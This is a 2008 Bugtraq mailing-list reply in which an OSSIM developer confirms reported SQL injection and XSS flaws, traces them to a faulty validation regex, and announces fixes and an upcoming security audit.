Date: Fri, 22 Feb 2008 08:50:52 +0100
From: Dominique Karg <dk@...im.net>
To: marcin.kopec@...mail.com
Cc: bugtraq@...urityfocus.com
Subject: Re: SQL-injection, XSS in OSSIM (Open Source Security Information Management)

Hello,

I can confirm this affecting earlier versions as well, the XSS has
been fixed some months ago, the SQL Injection (and others) were caused
by a failure in the "punctuation" validation regexp. Just fixed that
one as well as some others.

We're going to release a fixed version asap after stopping development
in order to get a throughout security audit done. The SQL regexp I
just fixed and we'll update the packages today.

Nonetheless, exposure should be minimal since:

a) You aren't going to provide public access to your SIM console,
aren't you ?
b) Regarding the specific SQL injection mentioned in here (as said,
there are more we're going to fix), you shouldn't give access to the
policy section to normal users either.

I must thank you for pointing this out but would've appreciate a more
"direct" contact, as it is considered a polite way of releasing bugs.

Greetings,

Dominique